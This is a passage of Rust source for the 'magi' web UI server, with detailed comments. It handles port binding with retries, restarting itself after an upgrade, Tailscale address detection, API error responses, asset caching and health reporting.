853/// caller finds the turn busy. That lets the loop run filesystem work outside
854/// this mutex while still making the final empty-check/release atomic with a
855/// concurrent queue handoff.
856#[derive(Debug, Default)]
857struct TalkTurns {
858    live: HashSet<String>,
859    queued: HashMap<String, u64>,
860}
861
862/// The atomic initial-state decision made by
863/// [`Ui::begin_talk_turn_unless_pending`].
864enum TalkTurnStart {
865    Claimed(TalkTurnGuard),
866    Busy,
867    Pending,
868}
869
870impl TalkTurnGuard {
871    /// Release while the caller already holds the claim mutex, closing the
872    /// last-drain/arrival gap without letting `Drop` revoke a later claim.
873    fn release(mut self, live: &mut TalkTurns) {
874        live.live.remove(&self.talk);
875        live.queued.remove(&self.talk);
876        self.released = true;
877    }
878}
879
880impl Drop for TalkTurnGuard {
881    fn drop(&mut self) {
882        if self.released {
883            return;
884        }
885        if let Ok(mut live) = self.turns.lock() {
886            live.live.remove(&self.talk);
887            live.queued.remove(&self.talk);
888        }
889    }
890}
891
892/// Releases a resume claim, so a run is resumable again after the attempt.
893struct ResumeGuard {
894    run: String,
895    resuming: Arc<Mutex<HashSet<String>>>,
896}
897
898impl Drop for ResumeGuard {
899    fn drop(&mut self) {
900        if let Ok(mut live) = self.resuming.lock() {
901            live.remove(&self.run);
902        }
903    }
904}
905
906/// Bind the port, waiting briefly for a predecessor to let go of it.
907///
908/// A restart hands the address from one process to the next, and the old one
909/// holds its listener until it unwinds. A single `bind` can lose that race,
910/// and for a restart triggered from a phone that means the deck never comes
911/// back with no terminal around to say why.
912///
913/// Bounded, and only for the one error a wait can fix: anything else fails at
914/// once, because retrying it would turn a clear message into a silence.
915async fn bind_waiting(socket: SocketAddr) -> Result<tokio::net::TcpListener> {
916    const WINDOW: Duration = Duration::from_secs(10);
917    const GAP: Duration = Duration::from_millis(250);
918
919    let deadline = std::time::Instant::now() + WINDOW;
920    let mut said = false;
921    loop {
922        match tokio::net::TcpListener::bind(socket).await {
923            Ok(listener) => return Ok(listener),
924            Err(e)
925                if e.kind() == std::io::ErrorKind::AddrInUse
926                    && std::time::Instant::now() < deadline =>
927            {
928                if !said {
929                    said = true;
930                    tracing::info!(
931                        "{socket} is still held - waiting up to {}s for it, \
932                         which is what a restart looks like from here",
933                        WINDOW.as_secs()
934                    );
935                }
936                tokio::time::sleep(GAP).await;
937            }
938            Err(e) => return Err(e).with_context(|| format!("bind {socket}")),
939        }
940    }
941}
942
943/// Signalled when an upgrade has replaced the binary and the successor should
944/// take this address over. One per process: there is one address to hand on.
945static HANDOVER: std::sync::LazyLock<Notify> = std::sync::LazyLock::new(Notify::new);
946
947/// Start this binary again with the same arguments, detached.
948///
949/// Called from [`serve`]'s exit path, *after* the listener has been dropped,
950/// so the address is already free when the successor binds it. The first
951/// attempt at this spawned the successor two hundred milliseconds before
952/// exiting instead, and the released binary - which has no bind retry - died
953/// on "address already in use" with its stdio sent to null, so the deck
954/// simply never came back.
955///
956/// Detached and without inherited stdio: the successor has to outlive this
957/// process, and must not hold open a pipe a terminal is waiting on.
958fn spawn_successor() -> Result<()> {
959    let exe = std::env::current_exe().context("find this binary")?;
960    let args: Vec<String> = std::env::args().skip(1).collect();
961    tracing::info!("restarting: {} {}", exe.display(), args.join(" "));
962
963    let mut cmd = std::process::Command::new(&exe);
964    cmd.args(&args)
965        .stdin(std::process::Stdio::null())
966        .stdout(std::process::Stdio::null())
967        .stderr(std::process::Stdio::null());
968    #[cfg(windows)]
969    {
970        use std::os::windows::process::CommandExt as _;
971        // DETACHED_PROCESS | CREATE_NEW_PROCESS_GROUP: no console to inherit,
972        // and Ctrl-C in the old terminal must not reach the successor.
973        cmd.creation_flags(0x0000_0008 | 0x0000_0200);
974    }
975    cmd.spawn().context("start the successor")?;
976    Ok(())
977}
978
979/// Serve the UI until Ctrl-C, finishing a run the loop has in flight.
980///
981/// The server itself owns no state, so nothing here is graceful for the HTTP
982/// side's sake: the connections go with the dropped listener, which costs a
983/// phone one change-stream reconnection it was going to make anyway.
984///
985/// The signal branch is not optional now that the loop lives in this process.
986/// [`daemon::serve_until`] listens for Ctrl-C itself, and a registered
987/// handler is what stops the signal terminating the process - so without a
988/// branch of our own, the first Ctrl-C after the operator started the loop
989/// would stop the loop and leave `magi web` listening forever, unkillable
990/// from the terminal it was started in.
991///
992/// What it waits for is the loop, not the sockets. A run in flight is
993/// finished first, for the reason [`daemon::serve`] gives: killing the graph
994/// mid-node leaves worktrees, branches and agent sessions behind and throws
995/// away every agent call already paid for.
996///
997/// The server therefore runs on a task of its own rather than inside the
998/// `select!`: an arm that resolves *drops* the futures the other arms were
999/// polling, so serving the address from inside one would take the deck down
1000/// at the instant the handover began and keep it down for the whole park -
1001/// up to `timeout_implement`, an hour by default. See [`hand_over`], which
1002/// owns the order.
1003pub async fn serve(opts: Opts) -> Result<()> {
1004    let (addr, warning) = resolve_bind(&opts.bind);
1005    if let Some(warning) = warning {
1006        tracing::warn!("{warning}");
1007    }
1008
1009    // Process-global, and therefore set exactly once, here: the report route
1010    // must never emit escape sequences into a browser, and toggling the flag
1011    // per request would race with a concurrent request rendering its own
1012    // report. Startup is the only moment at which no request can observe the
1013    // change. Nothing in the server turns colour back on.
1014    report::set_color(false);
1015
1016    let repo = normalize_default_repo(opts.repo).await;
1017    let ui = Ui::open(repo).with_merge(opts.merge);
1018    // Cloned before `ui.router()` consumes `ui` below: `hand_over` needs the
1019    // home to bracket the parking and restarting stages, and `run_update_recheck`
1020    // needs both it and the repo, and by then there is no `ui` left to read
1021    // them from.
1022    let home = ui.home.clone();
1023    let repo = ui.repo.clone();
1024    // Settles a progress record a predecessor left non-terminal - either this
1025    // *is* the successor `spawn_successor` started, or the previous process
1026    // died mid-handover. Before the router starts answering, so the very
1027    // first `/api/health` a phone gets from this process already reflects it.
1028    updater::reconcile_after_restart(&home);
1029    // `magi web` can stay up for days, and the one-time check `main.rs`'s
1030    // `spawn_update_check` does at startup only ever runs once: after that,
1031    // `/api/health`'s `update` field - and the phone's "Update & restart"
1032    // button, which reads the very same cache - would stay frozen on
1033    // whatever that single check found, no matter how many releases ship
1034    // afterwards. This keeps it current instead. Detached: it must keep
1035    // going for as long as this process serves, `serve` has nothing to await
1036    // it for, and it exits on its own the moment the process does.
1037    tokio::spawn(run_update_recheck(repo, home.clone()));
1038    let looping = ui.looping();
1039    let socket = SocketAddr::new(addr, opts.port);
1040    let listener = bind_waiting(socket).await?;
1041    let url = format!("http://{addr}:{}", opts.port);
1042    tracing::info!(
1043        "magi web UI on {url} - there is no authentication, so anyone who can \
1044         reach this address can file and hold tasks: the tailnet is the \
1045         security boundary"
1046    );
1047    tracing::info!(
1048        "the queue loop is not running yet - start it from the UI, which is \
1049         the whole reason this process can: nothing in the queue moves until \
1050         something is running the loop"
1051    );
1052    if opts.open {
1053        // The URL alone on stdout, for a caller that wants to open it. magi
1054        // does not spawn a browser: on the machine this usually runs on there
1055        // is no display, and a failed launch would be the only output.
1056        println!("{url}");
1057    }
1058
1059    // On its own task, so nothing this function awaits can stop the address
1060    // being answered. `hand_over` is where it is given up.
1061    let mut served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
1062    let interrupted = async {
1063        if tokio::signal::ctrl_c().await.is_err() {
1064            // No handler on this platform, so there is no signal to act on.
1065            // Never resolving is the safe answer: a failed registration must
1066            // not masquerade as the operator asking for a shutdown and take
1067            // the UI down on startup.
1068            std::future::pending::<()>().await;
1069        }
1070    };
1071    let handover = HANDOVER.notified();
1072    tokio::select! {
1073        joined = &mut served => match joined {
1074            Ok(outcome) => outcome.context("serve the web UI"),
1075            Err(e) => Err(e).context("the task serving the web UI ended"),
1076        },
1077        () = interrupted => {
1078            tracing::info!("shutting down the web UI");
1079            finish_loop(&looping).await;
1080            Ok(())
1081        }
1082        () = handover => {
1083            tracing::info!("upgraded - handing this address to the successor");
1084            hand_over(&home, &looping, served, spawn_successor).await
1085        }
1086    }
1087}
1088
1089/// `opts.repo`, or - when it is still `--repo`'s own default (`.`) and the
1090/// process's own working directory is not a git checkout at all - the
1091/// checkout [`repos::discover_verified`] finds instead.
1092///
1093/// Only the unmodified default is ever replaced: an operator who named a
1094/// directory outright, git checkout or not, gets exactly that directory
1095/// back, and the same story downstream (a talk whose briefing embeds a
1096/// non-git directory, and an agent that has to ask the operator where the
1097/// real repository is) that has always told them so - substituting a guess
1098/// for an explicit answer would be a second, silent opinion about what they
1099/// meant. There is no instruction or task text yet to match against this
1100/// early, so only [`repos::discover_verified`]'s own-repository tier can
1101/// ever settle this - the hint tier never fires here.
1102///
1103/// [`repos::discover_verified`], not [`repos::discover`]: a candidate this
1104/// found by filesystem shape alone is not yet trustworthy - a stale `.git`,
1105/// or a git installation that is broken in exactly the way that made the
1106/// original `canonical` check above fail too - so it is re-checked with
1107/// `git::toplevel` before it is ever used in place of the operator's own
1108/// directory.
1109async fn normalize_default_repo(repo: PathBuf) -> PathBuf {
1110    if repo != FsPath::new(".") {
1111        return repo;
1112    }
1113    let Ok(canonical) = repo.canonicalize() else {
1114        return repo;
1115    };
1116    if git::toplevel(&canonical).await.is_ok() {
1117        return repo;
1118    }
1119    let Some(home) = dirs::home_dir() else {
1120        return repo;
1121    };
1122    match repos::discover_verified(&home, &[], None, updater::repo_name()).await {
1123        Some(found) => {
1124            tracing::info!(
1125                "the default --repo `.` ({}) is not a git checkout; using {} instead - {}",
1126                canonical.display(),
1127                found.path.display(),
1128                found.reason,
1129            );
1130            found.path
1131        }
1132        None => repo,
1133    }
1134}
1135
1136/// Park the loop, then release the address, then start the successor.
1137///
1138/// The order is the whole function, and each step is answerable to a failure
1139/// this arrangement has already had:
1140///
1141/// 1. **Park.** The loop was asked to stop by the request that replaced the
1142///    binary, and this waits for it, because killing the graph mid-node
1143///    leaves worktrees, branches and agent sessions behind and throws away
1144///    every agent call already paid for. It takes as long as the node in
1145///    flight - up to `timeout_implement`, an hour by default - and the deck
1146///    goes on answering for all of it, which is the reason `served` is a task
1147///    rather than an arm of [`serve`]'s `select!`. It was an arm once: the
1148///    first upgrade from a phone that caught a run mid-implement dropped the
1149///    listener the moment it was asked to, and the operator got
1150///    `Cannot reach magi: Failed to fetch` with no way to see the park it was
1151///    waiting on and nothing but a process list to say the run was alive.
1152/// 2. **Release.** Aborting *and awaiting* the task is what frees the socket:
1153///    the join resolves only once the task's future has been dropped, so the
1154///    listener is released before the next line. Connections it already
1155///    accepted are served on tasks of their own and wind down asynchronously;
1156///    on some platforms (macOS) they can briefly keep the address busy, and
1157///    the successor's `bind_waiting` absorbs that.
1158/// 3. **Start the successor**, which binds the address this process has just
1159///    let go of - see [`spawn_successor`] for what the other order cost.
1160///
1161/// The [`updater::Progress`] bookkeeping bracketing steps 1 and 3 is
1162/// reporting, not part of the design: it exists so `/api/health` can say
1163/// "parking, waiting on run X" instead of leaving the phone to guess why the
1164/// deck went quiet, and dropping it would not change the order above.
1165async fn hand_over(
1166    home: &FsPath,
1167    looping: &Mutex<LoopState>,
1168    served: tokio::task::JoinHandle<std::io::Result<()>>,
1169    successor: impl FnOnce() -> Result<()>,
1170) -> Result<()> {
1171    if let Some(mut progress) = updater::read_progress(home) {
1172        progress.advance(updater::Stage::Parking);
1173        let _ = updater::write_progress(home, &progress);
1174    }
1175    finish_loop(looping).await;
1176    served.abort();
1177    let _ = served.await;
1178    if let Some(mut progress) = updater::read_progress(home) {
1179        progress.advance(updater::Stage::Restarting);
1180        let _ = updater::write_progress(home, &progress);
1181    }
1182    successor()
1183}
1184
1185/// Ask the loop to stop and wait for it, on the way out of [`serve`].
1186///
1187/// The wait is the whole function. Returning from `serve` while a graph is
1188/// mid-node ends the process with worktrees, branches and agent sessions left
1189/// behind and every agent call in that run paid for and thrown away, which is
1190/// exactly what the daemon's own shutdown refuses to do.
1191async fn finish_loop(state: &Mutex<LoopState>) {
1192    let live = lock_or_recover(state).live.take();
1193    let Some(live) = live else { return };
1194    live.stop.stop();
1195    lock_or_recover(state).rev += 1;
1196    tracing::info!("waiting for the loop to finish the run in flight");
1197    // The task records its own outcome and logs it, so there is nothing to do
1198    // with a join error here but stop waiting.
1199    let _ = live.handle.await;
1200}
1201
1202/// Resolve `--bind` to an address, plus a warning when the answer is not what
1203/// the operator asked for.
1204///
1205/// Split out from [`serve`] because the interesting half - deciding whether
1206/// Tailscale gave us something usable - is testable without opening a socket.
1207pub fn resolve_bind(bind: &Bind) -> (IpAddr, Option<String>) {
1208    match bind {
1209        Bind::Addr(addr) => (*addr, None),
1210        Bind::Auto => match tailscale_ip() {
1211            Ok(ip) => (IpAddr::V4(ip), None),
1212            Err(why) => (
1213                IpAddr::V4(Ipv4Addr::LOCALHOST),
1214                Some(format!(
1215                    "--bind auto fell back to 127.0.0.1: {why}. The UI is \
1216                     local-only and a phone cannot reach it; start Tailscale \
1217                     or pass --bind <addr>"
1218                )),
1219            ),
1220        },
1221    }
1222}
1223
1224/// This machine's Tailscale IPv4, or why there is not one.
1225///
1226/// `tailscale ip -4` is a local call against the running daemon and returns in
1227/// milliseconds, so it is fine to make it synchronously before the server
1228/// exists. Only an address inside `100.64.0.0/10` is accepted: that is the
1229/// CGNAT block Tailscale assigns from, and anything else on that output would
1230/// be a different tool answering.
1231fn tailscale_ip() -> std::result::Result<Ipv4Addr, String> {
1232    let out = std::process::Command::new("tailscale")
1233        .args(["ip", "-4"])
1234        .quiet()
1235        .output()
1236        .map_err(|e| format!("could not run `tailscale ip -4` ({e})"))?;
1237    if !out.status.success() {
1238        let why = String::from_utf8_lossy(&out.stderr);
1239        let why = why.trim();
1240        return Err(format!(
1241            "`tailscale ip -4` failed ({}){}",
1242            out.status,
1243            if why.is_empty() {
1244                String::new()
1245            } else {
1246                format!(": {why}")
1247            }
1248        ));
1249    }
1250    String::from_utf8_lossy(&out.stdout)
1251        .lines()
1252        .filter_map(|line| line.trim().parse::<Ipv4Addr>().ok())
1253        .find(is_tailnet)
1254        .ok_or_else(|| "`tailscale ip -4` printed no address in 100.64.0.0/10".to_owned())
1255}
1256
1257/// Is this address in the CGNAT block Tailscale hands out from?
1258fn is_tailnet(ip: &Ipv4Addr) -> bool {
1259    let o = ip.octets();
1260    o[0] == 100 && (64..=127).contains(&o[1])
1261}
1262
1263/// What every handler returns. Spelled out because `Result` in this crate is
1264/// `anyhow::Result`, and a handler's error is a status code as much as a
1265/// message.
1266type ApiResult<T> = std::result::Result<T, ApiError>;
1267
1268/// A handler failure, rendered as the `{"error": ".."}` body the UI expects.
1269#[derive(Debug)]
1270struct ApiError {
1271    status: StatusCode,
1272    message: String,
1273}
1274
1275impl ApiError {
1276    /// The client asked for something malformed.
1277    fn bad_request(message: impl Into<String>) -> Self {
1278        Self {
1279            status: StatusCode::BAD_REQUEST,
1280            message: message.into(),
1281        }
1282    }
1283
1284    /// No such run or task.
1285    fn not_found(message: impl Into<String>) -> Self {
1286        Self {
1287            status: StatusCode::NOT_FOUND,
1288            message: message.into(),
1289        }
1290    }
1291
1292    /// Someone else owns the thing the client wants to change.
1293    /// Re-badge an error whose default mapping is wrong for this route.
1294    fn with_status(mut self, status: StatusCode) -> Self {
1295        self.status = status;
1296        self
1297    }
1298
1299    /// A rules violation from a domain type, reported as the caller's fault.
1300    /// `Question::answer` rejects an unoffered choice, and that is a bad
1301    /// request, not a server error.
1302    fn bad_request_from(e: anyhow::Error) -> Self {
1303        Self::bad_request(format!("{e:#}"))
1304    }
1305
1306    fn conflict(message: impl Into<String>) -> Self {
1307        Self {
1308            status: StatusCode::CONFLICT,
1309            message: message.into(),
1310        }
1311    }
1312
1313    /// Our fault, or the disk's.
1314    fn internal(message: impl Into<String>) -> Self {
1315        Self {
1316            status: StatusCode::INTERNAL_SERVER_ERROR,
1317            message: message.into(),
1318        }
1319    }
1320}
1321
1322impl From<anyhow::Error> for ApiError {
1323    /// Errors from `queue` and `run` carry their context chain, and the whole
1324    /// chain goes to the client: "parse /home/x/runs/y/run.json: expected
1325    /// value at line 3" is a message an operator can act on, and there is no
1326    /// secret in a path on a single-user tailnet.
1327    fn from(e: anyhow::Error) -> Self {
1328        Self::internal(format!("{e:#}"))
1329    }
1330}
1331
1332impl IntoResponse for ApiError {
1333    fn into_response(self) -> Response {
1334        let body = serde_json::json!({ "error": self.message });
1335        (self.status, Json(body)).into_response()
1336    }
1337}
1338
1339/// Run a handler's filesystem work off the executor.
1340///
1341/// Every route that touches the disk goes through here rather than each one
1342/// arguing about whether its own read is small enough. Uniform because the
1343/// expensive case is not rare: `run.json` for a finished competition holds
1344/// every judgement, deliberation turn and review round, so listing a few
1345/// hundred runs is megabytes of parsing, and the executor threads doing it are
1346/// the same ones serving the change stream of every other connected phone.
1347async fn blocking<T>(job: impl FnOnce() -> ApiResult<T> + Send + 'static) -> ApiResult<T>
1348where
1349    T: Send + 'static,
1350{
1351    match tokio::task::spawn_blocking(job).await {
1352        Ok(result) => result,
1353        Err(e) => Err(ApiError::internal(format!("filesystem task failed: {e}"))),
1354    }
1355}
1356
1357/// Cache policy for the three compiled-in front-end files.
1358///
1359/// The whole interface is `include_str!`ed into the binary, so its content
1360/// changes only when the binary does - and a phone that keeps a copy is
1361/// welcome to, right up until the deck is replaced. Without a single cache
1362/// header, browsers were free to invent their own policy, and one did:
1363/// yukimemi's phone went on showing "Candidates must be folded before
1364/// deleting. Run `magi fold` first." - a sentence deleted two releases
1365/// earlier - from a run detail served by a deck that no longer contained it.
1366/// The delete button he was told about was right there, and unreachable.
1367///
1368/// `must-revalidate` with an `ETag` keyed on the version: the phone asks
1369/// every time, the answer is a 304 costing one small round trip while the
1370/// deck is unchanged, and the moment it is replaced the tag differs and the
1371/// new interface arrives. Correctness over bytes - this is one file of a few
1372/// tens of kilobytes on a tailnet, and being a version behind is not a
1373/// cosmetic problem when the difference is whether a button exists.
1374const ASSET_CACHE: &str = "no-cache, must-revalidate";
1375
1376/// `ETag` for the compiled-in assets, distinct per build.
1377///
1378/// The version alone would leave a locally built deck - `cargo install
1379/// --path .` twice at the same version, which is the normal way to iterate -
1380/// serving a stale tag for changed bytes. The build timestamp is what makes
1381/// two builds of `0.3.0` differ.
1382fn asset_etag() -> &'static str {
1383    static TAG: std::sync::LazyLock<String> = std::sync::LazyLock::new(|| {
1384        format!(
1385            "\"{}-{}\"",
1386            env!("CARGO_PKG_VERSION"),
1387            // Length is a cheap, deterministic stand-in for a hash: the
1388            // three files are compiled in together, so any edit to any of
1389            // them almost certainly changes the total, and a rebuild is what
1390            // this needs to track rather than every possible byte pattern.
1391            INDEX_HTML.len() + APP_CSS.len() + APP_JS.len()
1392        )
1393    });
1394    &TAG
1395}
1396
1397/// Headers for a compiled-in asset of `mime`.
1398fn asset_headers(mime: &'static str) -> [(header::HeaderName, &'static str); 3] {
1399    [
1400        (header::CONTENT_TYPE, mime),
1401        (header::CACHE_CONTROL, ASSET_CACHE),
1402        (header::ETAG, asset_etag()),
1403    ]
1404}
1405
1406/// Serve a compiled-in asset, answering `304` when the client already has it.
1407///
1408/// axum does not compare `If-None-Match` for us, and a header the server sets
1409/// but never honours is worse than none: the phone revalidates on every load
1410/// and is handed the whole file back each time. Doing the comparison is what
1411/// makes `must-revalidate` cost one small round trip rather than the
1412/// interface.
1413fn asset(headers: &header::HeaderMap, mime: &'static str, body: &'static str) -> Response {
1414    let tag = asset_etag();
1415    let known = headers
1416        .get(header::IF_NONE_MATCH)
1417        .and_then(|v| v.to_str().ok())
1418        // A revalidating client may send several, and a proxy may weaken the
1419        // tag to `W/"..."`; matching on containment covers both without
1420        // parsing the grammar.
1421        .is_some_and(|sent| sent.split(',').any(|one| one.trim().ends_with(tag)));
1422    if known {
1423        return (StatusCode::NOT_MODIFIED, asset_headers(mime)).into_response();
1424    }
1425    (asset_headers(mime), body).into_response()
1426}
1427
1428async fn index(headers: header::HeaderMap) -> Response {
1429    asset(&headers, "text/html; charset=utf-8", INDEX_HTML)
1430}
1431
1432async fn app_css(headers: header::HeaderMap) -> Response {
1433    asset(&headers, "text/css; charset=utf-8", APP_CSS)
1434}
1435
1436async fn app_js(headers: header::HeaderMap) -> Response {
1437    asset(&headers, "text/javascript; charset=utf-8", APP_JS)
1438}
1439
1440/// What `/api/health` answers.
1441#[derive(Debug, Serialize)]
1442struct HealthView {
1443    version: &'static str,
1444    home: String,
1445    queue_rev: u64,
1446    runs_rev: u64,
1447    /// The same revisions [`events`] streams for the question and talk
1448    /// stores.
1449    ///
1450    /// Here because this route is what the front end falls back to when the
1451    /// change stream is not up - it re-polls health on a timer and on wake, and
1452    /// takes the revisions from the answer. Without these the fallback
1453    /// compares `undefined` against `undefined` for both stores, decides
1454    /// nothing moved, and a phone with a dead stream never learns that a
1455    /// question was asked or that a talk took a turn. `queue_rev` and
1456    /// `runs_rev` above have always been here for exactly this reason; the rule
1457    /// is that every revision the stream carries, this route carries too.
1458    questions_rev: u64,
1459    /// See [`HealthView::questions_rev`]. The standing chat's own store.
1460    talks_rev: u64,
1461    /// See [`HealthView::questions_rev`]. The notification centre's store.
1462    notifications_rev: u64,
1463    /// Notifications nobody has read yet: the bell's badge before
1464    /// `/api/notifications` has answered.
1465    notifications_unread: usize,
1466    /// See [`HealthView::questions_rev`]. The loop's counter is the one that
1467    /// is not on disk anywhere, so a phone with no change stream has no other
1468    /// way to notice that the loop it is waiting on was started from another
1469    /// device.
1470    loop_rev: u64,
1471    /// Runs on disk whose state this build cannot parse - almost always a
1472    /// schema bump, occasionally a run killed mid-write.
1473    ///
1474    /// Reported because the list silently skips them, and "no competitions
1475    /// yet" is a lie when six of them are sitting in the runs directory. The
1476    /// terminal deck learned the same lesson: a run that fails to parse must
1477    /// not disappear from the count.
1478    runs_unreadable: usize,
1479    /// The disk, and what the runs and their worktrees occupy on it.
1480    ///
1481    /// This is the incident the janitor exists for: magi alone put 30 GB into
1482    /// one shared cache and 6.7-11 GB into each run's worktrees, and a phone
1483    /// is exactly where the operator learns "the disk is the constraint" -
1484    /// the diagnosis that a run is being held for want of space has to be
1485    /// checkable on the same screen.
1486    disk: DiskView,
1487    /// Questions nobody has answered yet, including ones an owner talked
1488    /// back on and is now waiting for the agent's reply to. A round trip
1489    /// never changes [`crate::ask::QuestionStatus`], so this does not drop
1490    /// while the ball is in the agent's court - see
1491    /// [`crate::ask::Questions::count_open`].
1492    questions_open: usize,
1493    /// Of those, how many actually need the owner right now: open, and not
1494    /// [`crate::ask::Question::waiting_on_agent`].
1495    ///
1496    /// The one number that means "nothing will happen until a human acts" -
1497    /// a parked run consumes nothing and progresses never - and the count the
1498    /// ask bar, the nav badge and the document title fall back to before
1499    /// `/api/questions` has answered, so those notification channels clear
1500    /// the instant the owner asks back and reappear the instant the agent
1501    /// replies, instead of sitting lit for however long the agent thinks.
1502    questions_needs_owner: usize,
1503    daemon: DaemonView,
1504    /// The loop in this process, exactly what `/api/loop` answers with.
1505    ///
1506    /// Here so a phone that has just woken needs one request to know whether
1507    /// anything is going to happen at all: `daemon` says a loop is alive
1508    /// somewhere, and this says whether it is one this UI can stop.
1509    #[serde(rename = "loop")]
1510    looping: LoopView,
1511    /// Whether a release newer than this build is known, and which.
1512    ///
1513    /// From [`updater::Checker::cached_update`] - the same throttled state the
1514    /// CLI's `notify` mode banners from - never a live check: this route is
1515    /// polled every few seconds, and a live check on each poll would spend
1516    /// GitHub's rate limit before the operator finished reading the strip.
1517    update: UpdateView,
1518    /// The self-upgrade this deck last set in motion, or `null` before the
1519    /// first one. Read off disk, so the successor can report what its
1520    /// predecessor started.
1521    upgrade: Option<UpgradeProgressView>,
1522}
1523
1524/// What `/api/health` knows about a release newer than this build.
1525///
1526/// A plain `Option<String>` for `to` could not distinguish "checked, and this
1527/// is already the newest" from "never checked" - both are `None` - and the
1528/// phone needs to tell those apart to decide whether the deck can be trusted
1529/// to have an opinion at all.
1530#[derive(Debug, Serialize)]
1531struct UpdateView {
1532    /// A newer release is known to exist.
1533    available: bool,
1534    /// Its tag, when `available`.
1535    to: Option<String>,
1536}
1537
1538/// [`updater::Progress`] as `/api/health` reports it.
1539#[derive(Debug, Serialize)]
1540struct UpgradeProgressView {
1541    stage: updater::Stage,
1542    from: String,
1543    to: Option<String>,
1544    /// What [`updater::Stage::Parking`] is waiting on, in words: the run and
1545    /// the step it is finishing before the address is handed over.
1546    waiting_on: Option<String>,
1547    started_at: Timestamp,
1548    updated_at: Timestamp,
1549    detail: Option<String>,
1550}
1551
1552/// Whether [`run_update_recheck`] may act at all this tick.
1553///
1554/// The same two conditions [`updater::Checker::new`] and
1555/// [`upgrade_post`] already honour: an operator who wrote `[update] mode =
1556/// "off"`, or who set [`updater::NO_AUTOUPDATE_ENV`], means "never contact
1557/// GitHub from this process" - on a button press or on a timer alike.
1558fn should_spawn_recheck(cfg: &Update) -> bool {
1559    cfg.mode != UpdateMode::Off && !updater::disabled_by_env()
1560}
1561
1562/// Whether this tick should actually reach the network, once checking itself
1563/// is allowed.
1564///
1565/// An upgrade already in flight must not be raced by a check that discovers
1566/// a *newer* release while one is still installing - a phone watching
1567/// `/api/health` would see the answer change out from under the upgrade it
1568/// already asked for. Past that, [`updater::Checker::should_check`] is the
1569/// same throttle the CLI's own notify mode and [`cached_update_view`] rely
1570/// on; deferring to it here, rather than to [`run_update_recheck`]'s own
1571/// polling period, is what keeps this task's network use to at most once per
1572/// `[update] interval` regardless of how often it wakes up.
1573fn update_recheck_due(checker: &updater::Checker, progress: Option<&updater::Progress>) -> bool {
1574    if progress.is_some_and(|p| !p.stage.terminal()) {
1575        return false;
1576    }
1577    checker.should_check()
1578}
1579
1580/// How long [`run_update_recheck`] sleeps before its next wake-up.
1581///
1582/// A fraction of the configured `[update] interval` rather than a fixed
1583/// number: a fixed sleep longer than a short custom interval would leave the
1584/// deck waiting on its own wake-up rather than on `should_check`, so an
1585/// operator who set `interval = "1m"` to make the UI catch up quickly would
1586/// not see that take effect until the next restart - exactly the bug this
1587/// task exists to fix, just moved one level down. Scaling with the interval
1588/// keeps the wake-up prompt relative to what was actually configured, while
1589/// [`update_recheck_due`]'s call to [`updater::Checker::should_check`] is
1590/// still what caps the network calls themselves at one per interval,
1591/// regardless of how often this fires.
1592fn recheck_poll_period(cfg: &Update) -> Duration {
1593    (updater::effective_interval(cfg) / 8).clamp(UPDATE_RECHECK_POLL_MIN, UPDATE_RECHECK_POLL_MAX)
1594}
1595
1596/// Keep `/api/health`'s `update` field current for as long as `magi web`
1597/// stays up.
1598///
1599/// The CLI's own `spawn_update_check` (`main.rs`) runs once per invocation,
1600/// which is enough for every other command: they exit in seconds. `magi web`
1601/// can run for days, so a single startup check leaves the cache - and the
1602/// phone's "Update & restart" button, which reads it via
1603/// [`cached_update_view`] - frozen on whatever that one look found, however
1604/// many releases ship afterwards. This is what notices the rest of them,
1605/// re-reading the config each tick so a `magi.toml` edit while the server is
1606/// up takes effect without a restart, the same way every other route here
1607/// already does - both for whether checking is on at all and for how long
1608/// the next sleep should be.
1609///
1610/// Not [`updater::spawn`]'s `auto_update` path, even under `mode =
1611/// "install"`: swapping the running binary out from under a task or a run
1612/// mid-node is exactly what `hand_over`'s parking exists to do deliberately,
1613/// not as a side effect of a timer nobody asked to fire. This only ever
1614/// calls [`updater::Checker::newer_release`], which refreshes
1615/// `last_update_check.json` and nothing else - so under `mode = "install"`
1616/// this behaves like `notify` for as long as the deck stays up, and an
1617/// actual self-install still happens exactly where it always has: once, at
1618/// the next process start.
1619async fn run_update_recheck(repo: PathBuf, home: PathBuf) {
1620    loop {
1621        let (cfg, _) = Config::discover(&repo, None).unwrap_or_default();
1622        tokio::time::sleep(recheck_poll_period(&cfg.update)).await;
1623        if !should_spawn_recheck(&cfg.update) {
1624            continue;
1625        }
1626        let Some(checker) = updater::Checker::new(&cfg.update) else {
1627            continue;
1628        };
1629        let progress = updater::read_progress(&home);
1630        if !update_recheck_due(&checker, progress.as_ref()) {
1631            continue;
1632        }
1633        if let Err(e) = checker.newer_release().await {
1634            tracing::warn!("background update recheck failed: {e:#}");
1635        }
1636    }
1637}
1638
1639/// [`UpdateView`] from the same throttled, disk-only state
1640/// [`crate::updater::Checker::cached_update`] gives the CLI's `notify` mode -
1641/// never a live check. `[update] mode = "off"` answers "unknown" the same as
1642/// no cached state at all, which is correct: an operator who turned checking
1643/// off gets no opinion, not a stale one.
1644fn cached_update_view(repo: &FsPath) -> UpdateView {
1645    let (cfg, _) = Config::discover(repo, None).unwrap_or_default();
1646    let latest = updater::Checker::new(&cfg.update).and_then(|c| c.cached_update());
1647    match latest {
1648        Some(latest) => UpdateView {
1649            available: true,
1650            to: Some(latest.tag_name),
1651        },
1652        None => UpdateView {
1653            available: false,
1654            to: None,
1655        },
1656    }
1657}
1658
1659/// [`updater::Progress`] as `/api/health` reports it, filling in `waiting_on`
1660/// from the parked run's own state when the stage is
1661/// [`updater::Stage::Parking`] - the run and the node it is finishing are
1662/// already on disk in `run.json`, so this reads them fresh rather than
1663/// trusting whatever was true the moment the park was requested.
1664fn upgrade_progress_view(ui: &Ui, progress: updater::Progress) -> UpgradeProgressView {
1665    let waiting_on = (progress.stage == updater::Stage::Parking)
1666        .then_some(progress.parked_run.as_deref())
1667        .flatten()
1668        .and_then(|id| read_run(&ui.runs, id).ok())
1669        .map(|run| {
1670            format!(
1671                "run {} is finishing {} before the address is handed over",
1672                run.short(),
1673                run.status.as_str()
1674            )
1675        });
1676    UpgradeProgressView {
1677        stage: progress.stage,
1678        from: progress.from,
1679        to: progress.to,
1680        waiting_on,
1681        started_at: progress.started_at,
1682        updated_at: progress.updated_at,
1683        detail: progress.detail,
1684    }
1685}
1686
1687/// The disk figures `/api/health` carries. Every number is produced by
1688/// [`crate::disk`], the same code that decides a run may not start, so the
1689/// health screen and the gate cannot disagree about what the machine looks
1690/// like.
1691#[derive(Debug, Serialize)]
1692struct DiskView {
